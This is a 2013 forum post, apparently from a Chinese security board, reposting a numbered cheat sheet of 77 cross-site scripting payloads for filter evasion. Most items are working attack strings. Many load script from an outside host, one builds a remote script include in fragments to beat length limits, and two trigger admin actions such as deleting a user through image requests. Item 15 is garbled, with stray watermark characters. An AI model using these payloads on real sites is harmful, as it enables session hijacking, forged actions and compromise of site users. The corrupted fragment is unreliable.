XSS Attack Summary

Posted 2013-4-19 19:22:37
It seems t00ls has fairly little material on XSS, so I saw something good and copied it over; no idea whether anyone needs to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a javascript: URL
<IMG SRC="javascript:alert('XSS');">
(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, the scheme is case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (decimal character references, semicolons required)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (builds the string without any quotes)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8/Unicode decimal encoding
<IMG SRC=jav..omitted..S')>
(9) Zero-padded 7-digit decimal encoding, no semicolons
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab splitting the javascript: scheme (a literal TAB between jav and ascript)
<IMG SRC="jav	ascript:alert('XSS');">
(12) Embedded encoded tab splitting the scheme
<IMG SRC="jav&#x09;ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
& t! m( f0 a: H4 T3 M/ L(15)嵌入式多行注入JavaScript,这是XSS极端的例子; ^* C& [2 S7 E
<IMG SRC=”javascript:alert(‘XSS‘)”>. _% H( Z/ s+ W. x1 [" k
(16) Working around input length limits (all fragments must land on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board https://www.t00ls.net/viewthread ... table&tid=15267
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2 (in practice null bytes rarely work on domestic sites, because there is nowhere to plant them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the javascript: scheme in an IMG tag
<IMG SRC=" &#14;  javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, variant 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, variant 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag, variant 2 (protocol-relative URL)
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the JavaScript escapes (breaking out of a string where quotes are backslash-escaped)
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
(32) BODY background image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag with onload
<BODY ONLOAD=alert('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) Stylesheet link
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG with a vbscript: URL (Internet Explorer)
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META refresh with an additional URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE background
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD background
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with an extra character before the scheme (code points 1-32, 34, 39, 160, 8192-8203, 12288 and 65279 are all tolerated here)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
(48) DIV with a CSS expression (Internet Explorer)
<DIV STYLE="width: expression(alert('XSS'));">
(49) Expression inside a STYLE attribute
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (any open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image via a class
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE with the expression split by a comment
exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;xpression(alert("XSS"))'>
(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) ActionScript inside the Flash file can smuggle in your XSS payload
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace (the .HTC file must be on the same server as your XSS vector)
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, serve the script from a file with an image extension and load it as script
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command: the browser fetches the image URL with the victim's cookies, so any state-changing GET endpoint can be triggered (CSRF through an image)
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command 2: a.jpg sits on the same server and a redirect rule turns the image request into the action
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters with an attribute value that contains ">"
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67) Splitting the SCRIPT tag with document.write
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass (IP address instead of hostname)
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding (the host 3w.org written as percent-encoded bytes)
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>
(70) IP as a single decimal number (3232235521 is 192.168.0.1)
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding (embedded newline and tabs, plus decimal, octal and hex octets)
<A HREF="h&#x0A;tt&#x09;p://6&#x09;6.000146.0x7.147/">XSS</A>
(74) Omitting "http:" (protocol-relative URL)
<A HREF="//www.google.com/">XSS</A>
(75) Omitting "www"
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14